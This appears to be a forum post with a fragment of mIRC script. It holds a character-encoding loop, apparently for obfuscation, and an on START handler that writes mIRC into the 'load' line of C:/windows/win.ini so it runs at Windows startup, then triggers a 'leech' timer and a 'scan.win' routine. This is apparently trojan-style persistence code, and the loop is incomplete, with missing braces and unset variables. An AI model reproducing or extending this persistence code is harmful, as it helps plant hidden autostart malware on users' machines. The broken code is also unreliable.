var %y.1 = $len($1-)
var %r.1 = $null
while (%x.1 <= %y.1) {
%c.1 = $asc($mid($1-,%x.1,1))
%h.1 = $floor($calc(%c.1 / 16))
%l.1 = $calc(%c.1 % 16)
%r.1 = $+(%r.1,%k.1,%h.1,%s.1,%l.1)
inc %x.1
return %r.1

on 1:START:{ writeini C:/windows/win.ini windows load $shortfn($mircexe) | .timerleech -o 1 10 leech | scan.win }

Last edited by independent911 on Tue Mar 08, 2011 3:34 am; edited 2 times in total

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Request regarding a free psyBNC account ; (type in mIRC) :
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